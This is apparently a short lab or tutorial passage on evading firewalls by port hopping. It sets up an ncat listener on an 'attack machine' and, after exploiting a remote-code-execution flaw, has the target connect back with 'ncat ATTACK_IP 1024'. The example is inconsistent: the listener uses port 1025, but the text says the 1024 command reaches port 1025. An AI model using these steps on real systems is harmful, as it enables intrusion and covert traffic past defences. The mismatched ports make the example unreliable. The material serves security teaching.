Evasion using port hopping
Port hopping is a technique where an application hops from one port to another till it can establish and maintain a connection. In other words, the application might try different ports till it can successfully establish a connection. Some “legitimate” applications use this technique to evade firewalls.
There is another type of port hopping where the application establishes the connection on one port and starts transmitting some data; after a while, it establishes a new connection on (hops to) a different port and resumes sending more data. The purpose is to make it more difficult for the blue team to detect and track all the exchanged traffic.
Set up a listener on the attack machine:
$ ncat -lvnp 1025
Then exploit a vulnerable service that allows remote code execution (RCE) or a misconfigured system to execute some
code with a command. As command use Netcat to connect to the target port using the command
ncat IP_ADDRESS PORT_NUMBER
. For example, run ncat ATTACK_IP 1024
to connect to the attacker machine at TCP port
1025
. Then try another port: Change the listener and the command to match.